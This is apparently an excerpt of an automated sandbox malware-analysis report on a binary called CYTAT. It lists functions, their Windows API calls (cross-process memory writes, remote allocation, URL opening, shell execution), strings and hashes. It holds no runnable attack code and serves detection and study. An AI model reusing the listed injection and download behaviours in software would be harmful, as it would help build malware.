                                                • Opcode ID: 275befd32e5b5cb51e2fc879a9ecc6bbb724afd33f596a1e549e31a6ffdfd8c7
                                                • Instruction ID: 2644725dabb75134900838bfbf7f9974cf5b6b8c274c659ea1b0544ab4b4cf98
                                                • Opcode Fuzzy Hash: 275befd32e5b5cb51e2fc879a9ecc6bbb724afd33f596a1e549e31a6ffdfd8c7
                                                • Instruction Fuzzy Hash: A6A1CB756042019FC700EF65C980E5BB7E9AFC8308F108A5EF9859B392DB35EC45CBA6
                                                Function 0044E180 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: _memmove
                                                • String ID: \
                                                • API String ID: 4104443479-2967466578
                                                • Opcode ID: 236e1e21dc65edc907fd0526d8e82b29cd887e6a6cae6abce2d2318f267918b8
                                                • Instruction ID: 90b25fc4546a2c21e21e7939c456fa175a28996bec6c3309f7edcf8d77039fcb
                                                • Opcode Fuzzy Hash: 236e1e21dc65edc907fd0526d8e82b29cd887e6a6cae6abce2d2318f267918b8
                                                • Instruction Fuzzy Hash: 8AB1C270D04289CFEF15CFA9C8807AEBBB2BF55308F28419ED451AB381D7795946CB1A
                                                Function 0044E189 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: _memmove
                                                • String ID: \
                                                • API String ID: 4104443479-2967466578
                                                • Opcode ID: aaea77048b6460e77790bc9063151364371e311f89c51572a31744d174c5d814
                                                • Instruction ID: 47d8400a167da4587eb122393216330e55bf30386b581c043e0675457d4a745f
                                                • Opcode Fuzzy Hash: aaea77048b6460e77790bc9063151364371e311f89c51572a31744d174c5d814
                                                • Instruction Fuzzy Hash: F1B1C270D04289CFEF15CFA9C8807AEBBB2BF55308F28419ED451AB381D7795946CB1A
                                                Function 0044E199 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 260COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: _memmove
                                                • String ID: \
                                                • API String ID: 4104443479-2967466578
                                                • Opcode ID: 51371dbcd6d614fdce5bfd4d2520a50a5cfc61004088100711ab8bbb78939718
                                                • Instruction ID: 4d1558bed40bbae7f26d93592334ac0d2c658ca85fbb7fec499742c135aa7d63
                                                • Opcode Fuzzy Hash: 51371dbcd6d614fdce5bfd4d2520a50a5cfc61004088100711ab8bbb78939718
                                                • Instruction Fuzzy Hash: E5A1C270D04289CFEF15CFA9C8807AEBBB2BF55308F28419ED441AB381D7795946CB1A
                                                Function 0046A6E1 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 241COMMON
                                                Download Yara Rule
                                                Strings
                                                • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 0046A75B
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: _memmovestd::exception::exception$Exception@8Throw_malloc_wcslen
                                                • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                • API String ID: 708495834-557222456
                                                • Opcode ID: 0835c6591df01f69715f5e8aca6b92cd03353c77de4b2b2244ddd74c7a14709d
                                                • Instruction ID: 9c514e09f8cb76db8ae150367893d7536957bb5c5403f45e3580b17af89e858a
                                                • Opcode Fuzzy Hash: 0835c6591df01f69715f5e8aca6b92cd03353c77de4b2b2244ddd74c7a14709d
                                                • Instruction Fuzzy Hash: 7C917F711087009FC310EF65C88186BB7E8AF89314F148D2FF595672A2E778E919CB9B
                                                Function 0043659E Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 162windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00434319: WriteProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0043434A
                                                • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 004365EF
                                                  • Part of subcall function 004342DD: ReadProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0043430E
                                                  • Part of subcall function 004343AD: GetWindowThreadProcessId.USER32(?,?), ref: 004343E0
                                                  • Part of subcall function 004343AD: OpenProcess.KERNEL32(00000438,00000000,?), ref: 004343F1
                                                  • Part of subcall function 004343AD: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004), ref: 00434408
                                                • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0043665F
                                                • SendMessageW.USER32(00000000,00001111,00000000,00000000), ref: 004366DF
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                • String ID: @
                                                • API String ID: 4150878124-2766056989
                                                • Opcode ID: 6104cbe5d4ae3c4c99a3306f76968d572a7f9f5d55716afa725ed0ba86ca2a2d
                                                • Instruction ID: 60a9f40d71a87185ad744a771aacdfc79ad0a16393efc777ae91d2f205fac39b
                                                • Opcode Fuzzy Hash: 6104cbe5d4ae3c4c99a3306f76968d572a7f9f5d55716afa725ed0ba86ca2a2d
                                                • Instruction Fuzzy Hash: 0D51B972A00218ABCB10DFA5DD42FDEB778EFC9304F00459AFA05EB180D6B4BA45CB65
                                                Function 0044F137 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 161COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: _memmove
                                                • String ID: \$]$h
                                                • API String ID: 4104443479-3262404753
                                                • Opcode ID: 176a597a96dcd2a70b70cc410daef71b144e937b03d0c11d284d361abdce2453
                                                • Instruction ID: f8aecd1968ad4f88b1990a67d2c0a139cd5c037738d7fdf96801fcbc28408ccb
                                                • Opcode Fuzzy Hash: 176a597a96dcd2a70b70cc410daef71b144e937b03d0c11d284d361abdce2453
                                                • Instruction Fuzzy Hash: 97518470E00209DFDF18CFA5C980AAEB7F2BF85304F29826AD405AB355D7385D45CB55
                                                Function 00457C53 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 158COMMON
                                                Download Yara Rule
                                                APIs
                                                • ShellExecuteExW.SHELL32(0000003C), ref: 00457D67
                                                  • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                  • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                • CloseHandle.KERNEL32(?), ref: 00457E09
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: CloseExecuteHandleShell_wcscpy_wcslen
                                                • String ID: <$@
                                                • API String ID: 2417854910-1426351568
                                                • Opcode ID: 456975d6943100b9bccf6a944bdff1bb50055e47ea808eda8884d41227499f4e
                                                • Instruction ID: b88a15a70aa0ad5f6f29005b2a8070d35214d1ef645994392ec84fe4d9ca6df0
                                                • Opcode Fuzzy Hash: 456975d6943100b9bccf6a944bdff1bb50055e47ea808eda8884d41227499f4e
                                                • Instruction Fuzzy Hash: C751D3719002089BDB10EFA1D985AAFB7B4EF44309F10446EED05AB352DB79ED49CB94
                                                Function 0044A856 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 122networkCOMMON
                                                Download Yara Rule
                                                APIs
                                                • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0044A87A
                                                • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044A8C9
                                                • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0044A901
                                                  • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: Http$ErrorInfoInternetLastOpenQueryRequestSend
                                                • String ID:
                                                • API String ID: 3705125965-3916222277
                                                • Opcode ID: 0ee13e9a60eb6ba6c748d714ed0ce9e8e081c7518857538375ec5b6ad63af0be
                                                • Instruction ID: d28fa13b4dde737238ce5dcfaacd3c540a76458eeabd88e5a6b3f8614e5f537b
                                                • Opcode Fuzzy Hash: 0ee13e9a60eb6ba6c748d714ed0ce9e8e081c7518857538375ec5b6ad63af0be
                                                • Instruction Fuzzy Hash: DB310B76A802047AE720EF56DC42FDFB7A8EBD9710F00851FFA0097281D6B5550987AC
                                                Function 0045FA41 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 120windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetMenuItemInfoW.USER32 ref: 0045FAC4
                                                • DeleteMenu.USER32(?,?,00000000), ref: 0045FB15
                                                • DeleteMenu.USER32(00000000,?,00000000), ref: 0045FB68
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: Menu$Delete$InfoItem
                                                • String ID: 0
                                                • API String ID: 135850232-4108050209
                                                • Opcode ID: 44596b6c283006d3404d95c3e5e16104138b05286e513df4f299336d423ce3c8
                                                • Instruction ID: 2caf7e1b7ae413ca61a5456c92b2eab9e90ede26a48057f627e29f4096114103
                                                • Opcode Fuzzy Hash: 44596b6c283006d3404d95c3e5e16104138b05286e513df4f299336d423ce3c8
                                                • Instruction Fuzzy Hash: CC41D2B1604201ABD710CF25CC45F17B7A9AF84315F148A2EFDA49B2C2D378E849CBA6
                                                Function 004507B7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                                Download Yara Rule
                                                APIs
                                                • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013), ref: 0045085F
                                                • GetWindowLongW.USER32(?,000000F0), ref: 0045087D
                                                • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0045088E
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: Window$Long
                                                • String ID: SysTreeView32
                                                • API String ID: 847901565-1698111956
                                                • Opcode ID: 6654344cdbbec2ecb5663208c63790126aca218b871aedcbee15bef271784643
                                                • Instruction ID: 2f6c96d6d770cdd7f6b01965cae739f5ffbb06f7b8c4bfc7c6bf121f6b9a1f40
                                                • Opcode Fuzzy Hash: 6654344cdbbec2ecb5663208c63790126aca218b871aedcbee15bef271784643
                                                • Instruction Fuzzy Hash: 34418D75500205ABEB10DF29DC84FEB33A8FB49325F20471AF865972D1D778E895CBA8
                                                Function 00434B02 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 108libraryloaderCOMMON
                                                Download Yara Rule
                                                APIs
                                                • LoadLibraryA.KERNEL32(?), ref: 00434B10
                                                • GetProcAddress.KERNEL32(?,AU3_GetPluginDetails), ref: 00434B88
                                                • FreeLibrary.KERNEL32(?), ref: 00434B9F
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: Library$AddressFreeLoadProc
                                                • String ID: AU3_GetPluginDetails
                                                • API String ID: 145871493-4132174516
                                                • Opcode ID: 525874d34911f66d3e6dd89a42f64d0fb8abb6a055dcd3ee386d4a3c405b38ac
                                                • Instruction ID: fc8523f5daf935d660d2a9c884068eb8da3e2fc1adb06f3317e0194b47a185ca
                                                • Opcode Fuzzy Hash: 525874d34911f66d3e6dd89a42f64d0fb8abb6a055dcd3ee386d4a3c405b38ac
                                                • Instruction Fuzzy Hash: C24107B9600605EFC710DF59D8C0E9AF7A5FF89304B1082AAEA1A8B311D735FD52CB95
                                                Function 00450D6B Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 102windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00450DFD
                                                • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00450E16
                                                • SendMessageW.USER32(?,00001002,00000000,?), ref: 00450E3E
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: MessageSend$Window
                                                • String ID: SysMonthCal32
                                                • API String ID: 2326795674-1439706946
                                                • Opcode ID: aa3fdffd2c37c9d1283d502314bb1f920e47acbbfa02c8d10baeab348a12d0cc
                                                • Instruction ID: 97bf4b40409f6c90460d1384a7672ac630dd7a2161d32aee0dcf483843136ede
                                                • Opcode Fuzzy Hash: aa3fdffd2c37c9d1283d502314bb1f920e47acbbfa02c8d10baeab348a12d0cc
                                                • Instruction Fuzzy Hash: A93195752002046BDB10DEA9DC85FEB73BDEB9C724F104619FA24A72C1D6B4FC558B64
                                                Function 004509D8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 97COMMON
                                                Download Yara Rule
                                                APIs
                                                • DestroyWindow.USER32(00000000), ref: 00450A2F
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: DestroyWindow
                                                • String ID: msctls_updown32
                                                • API String ID: 3375834691-2298589950
                                                • Opcode ID: ede3ba3c4388c74c76a3cd747824982d62f6d25d37162a4df1ebcaa7ffb6df4e
                                                • Instruction ID: fccd3fcc05e4e2aaf5990a1cc96ccc3c6d01ef6560d5fec67e6c7c3c5f699695
                                                • Opcode Fuzzy Hash: ede3ba3c4388c74c76a3cd747824982d62f6d25d37162a4df1ebcaa7ffb6df4e
                                                • Instruction Fuzzy Hash: 213182767402056FE710DF58EC81FAB3368FF99710F10411AFA009B282C7B5AC96C7A8
                                                Function 0044DC13 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 95COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: _memmove
                                                • String ID: $<
                                                • API String ID: 4104443479-428540627
                                                • Opcode ID: 6c7976b20de454da7fe1266d8cf8ce191b2ccd068f9cf911d6d19d23786630cd
                                                • Instruction ID: e8c4ca86f7ae52158d8313b00b6d431508e51e3fea12eaab667d4a9530e7d8b8
                                                • Opcode Fuzzy Hash: 6c7976b20de454da7fe1266d8cf8ce191b2ccd068f9cf911d6d19d23786630cd
                                                • Instruction Fuzzy Hash: A331EF30D04258DEFF25CFAAC9847EEBBB1AF11310F18419AD455A7382D7789E48CB25
                                                Function 0045D779 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 80COMMON
                                                Download Yara Rule
                                                APIs
                                                • SetErrorMode.KERNEL32(00000001), ref: 0045D79D
                                                • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D812
                                                • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D85C
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: ErrorMode$DiskFreeSpace
                                                • String ID: \VH
                                                • API String ID: 1682464887-234962358
                                                • Opcode ID: e9044521b94c7a2fd6e775d53faddef87f956e6addecf71534c1072a2e4d61eb
                                                • Instruction ID: 72795a51c8fd7a71edb0939b11d44c3a5eb04741920228a3d2c34b8a4a3992bf
                                                • Opcode Fuzzy Hash: e9044521b94c7a2fd6e775d53faddef87f956e6addecf71534c1072a2e4d61eb
                                                • Instruction Fuzzy Hash: B5217171D002089FCB00EFA5D98499EBBB8FF48314F1184AAE805AB351D7349E05CB64
